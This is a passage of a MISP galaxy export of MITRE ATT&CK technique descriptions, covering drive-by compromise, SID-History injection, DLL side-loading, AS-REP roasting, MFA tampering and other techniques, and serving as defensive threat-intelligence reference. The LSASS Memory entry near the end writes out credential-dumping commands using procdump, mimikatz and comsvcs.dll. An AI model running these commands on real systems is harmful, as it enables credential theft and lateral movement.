Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user’s web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).

Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:

  • Inserting malicious scripts into web pages or other user controllable web content such as forum posts

  • Modifying script files served to websites from publicly writeable cloud storage buckets

  • Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))

In addition to staging content to exploit a user’s web browser, adversaries may also stage scripting content to profile the user’s browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)

Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to as a strategic web compromise or watering hole attack.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).

The tag is: misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004"

Table 5963. Table References

Links

http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

https://attack.mitre.org/techniques/T1608/004

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html

Non-Standard Encoding - T1132.002

Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding)

The tag is: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002"

Table 5964. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1132/002

https://en.wikipedia.org/wiki/Binary-to-text_encoding

https://en.wikipedia.org/wiki/Character_encoding

SID-History Injection - T1134.005

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).

The tag is: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005"

Table 5965. Table References

Links

https://adsecurity.org/?p=1772

https://attack.mitre.org/techniques/T1134/005

https://msdn.microsoft.com/library/ms677982.aspx

https://msdn.microsoft.com/library/ms679833.aspx

https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx

https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems

https://technet.microsoft.com/library/ee617241.aspx

One-Way Communication - T1481.003

Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to a compromised system without receiving return output. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.

Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1481.003"

Table 5966. Table References

Links

https://attack.mitre.org/techniques/T1481/003

DLL Side-Loading - T1574.002

Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)

The tag is: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002"

Table 5967. Table References

Links

https://attack.mitre.org/techniques/T1574/002

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

AS-REP Roasting - T1558.004

Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017)

Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)

For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)

The tag is: misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"

Table 5968. Table References

Links

http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

https://adsecurity.org/?p=2293

https://attack.mitre.org/techniques/T1558/004

https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768

https://redsiege.com/kerberoast-slides

https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx

Re-opened Applications - T1547.007

Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.

Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.

The tag is: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1547.007"

Table 5969. Table References

Links

https://attack.mitre.org/techniques/T1547/007

https://support.apple.com/en-us/HT204005

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Multi-Factor Authentication - T1556.006

Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.

Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)

For example, modifying the Windows hosts file (C:\windows\system32\drivers\etc\hosts) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022)

Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim’s network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication - T1556.006"

Table 5970. Table References

Links

https://attack.mitre.org/techniques/T1556/006

https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

https://www.mandiant.com/media/17826

Obtain/re-use payloads - T1346

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1346).

A payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain/re-use payloads - T1346"

Table 5971. Table References

Links

https://attack.mitre.org/techniques/T1346

Multi-Stage Channels - T1104

Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.

The tag is: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104"

Table 5972. Table References

Links

https://attack.mitre.org/techniques/T1104

DLL Side-Loading - T1073

Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)

Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073"

Table 5973. Table References

Links

https://attack.mitre.org/techniques/T1073

https://capec.mitre.org/data/definitions/641.html

https://msdn.microsoft.com/en-us/library/aa375365

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

Command-Line Interface - T1605

Adversaries may use built-in command-line interfaces to interact with the device and execute commands. Android provides a bash shell that can be interacted with over the Android Debug Bridge (ADB) or programmatically using Java’s Runtime package. On iOS, adversaries can interact with the underlying runtime shell if the device has been jailbroken.

If the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.

The tag is: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605"

Table 5974. Table References

Links

https://attack.mitre.org/techniques/T1605

Non-Standard Port - T1509

Adversaries may generate network traffic using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

The tag is: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1509"

Table 5975. Table References

Links

https://attack.mitre.org/techniques/T1509

Re-opened Applications - T1164

Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well, located at <code>~/Library/Preferences/com.apple.loginwindow.plist</code> and <code>~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist</code>.

An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).

The tag is: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164"

Table 5976. Table References

Links

https://attack.mitre.org/techniques/T1164

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Non-Standard Port - T1571

Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)

The tag is: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571"

Table 5977. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1571

https://twitter.com/TheDFIRReport/status/1498657772254240768

https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

SID-History Injection - T1178

The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).

The tag is: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178"

Table 5978. Table References

Links

https://adsecurity.org/?p=1772

https://attack.mitre.org/techniques/T1178

https://msdn.microsoft.com/library/ms677982.aspx

https://msdn.microsoft.com/library/ms679833.aspx

https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx

https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems

https://technet.microsoft.com/library/ee617241.aspx

Multi-hop Proxy - T1188

To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.

The tag is: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188"

Table 5979. Table References

Links

https://attack.mitre.org/techniques/T1188

Drive-by Compromise - T1189

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:

  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting

  • Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary

  • Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))

  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to as a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)

Typical drive-by compromise process:

  1. A user visits a website that is used to host the adversary controlled content.

  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.

    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.

  3. Upon finding a vulnerable version, exploit code is delivered to the browser.

  4. If exploitation is successful, then it will give the adversary code execution on the user’s system unless other protections are in place.

    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189"

Table 5980. Table References

Links

http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/

https://attack.mitre.org/techniques/T1189

https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/

Pre-OS Boot - T1542

Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control the flow of execution before the operating system takes control.(Citation: Wikipedia Booting)

Adversaries may overwrite data in boot drivers or firmware such as the BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect, as malware at this level will not be detected by host software-based defenses.

The tag is: misp-galaxy:mitre-attack-pattern="Pre-OS Boot - T1542"

Table 5981. Table References

Links

https://attack.mitre.org/techniques/T1542

https://en.wikipedia.org/wiki/Booting

https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

Drive-By Compromise - T1456

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring an [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist, including:

  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.

  • Malicious ads are paid for and served through legitimate ad providers.

  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to as a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Lookout-StealthMango)

Typical drive-by compromise process:

  1. A user visits a website that is used to host the adversary controlled content.

  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.

    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.

  3. Upon finding a vulnerable version, exploit code is delivered to the browser.

  4. If exploitation is successful, then it will give the adversary code execution on the user’s system unless other protections are in place.

    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

The tag is: misp-galaxy:mitre-attack-pattern="Drive-By Compromise - T1456"

Table 5982. Table References

Links

https://attack.mitre.org/techniques/T1456

https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html

Inter-Process Communication - T1559

Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occur when processes are stuck in a cyclic waiting pattern.

Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on the OS, but they typically exist in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which are sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559"

Table 5983. Table References

Links

https://attack.mitre.org/techniques/T1559

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC)

Token Impersonation/Theft - T1134.001

Adversaries may duplicate then impersonate another user’s existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using DuplicateToken or DuplicateTokenEx. The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user’s security context, or with SetThreadToken to assign the impersonated token to a thread.

An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using CreateProcessWithTokenW or CreateProcessAsUserW. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.

The tag is: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001"

Table 5984. Table References

Links

https://attack.mitre.org/techniques/T1134/001

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

DNS/Passive DNS - T1596.001

Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.

Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="DNS/Passive DNS - T1596.001"

Table 5985. Table References

Links

https://attack.mitre.org/techniques/T1596/001

https://dnsdumpster.com/

https://www.circl.lu/services/passive-dns/

Junk Data - T1001.001

Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

The tag is: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001"

Table 5986. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1001/001

Traffic Duplication - T1020.001

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)

Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)

Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)

Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.

The tag is: misp-galaxy:mitre-attack-pattern="Traffic Duplication - T1020.001"

Table 5987. Table References

Links

https://attack.mitre.org/techniques/T1020/001

https://cloud.google.com/vpc/docs/packet-mirroring

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview

https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html

https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html

https://www.us-cert.gov/ncas/alerts/TA18-106A

LSASS Memory - T1003.001

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

  • <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

  • <code>sekurlsa::Minidump lsassdump.dmp</code>

  • <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

  • <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code> (Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)

Windows Security Support Provider (SSP) DLLs are loaded into the LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

  • Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.

  • Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)

  • Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.

  • CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

The tag is: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"

Table 5988. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1003/001

https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/

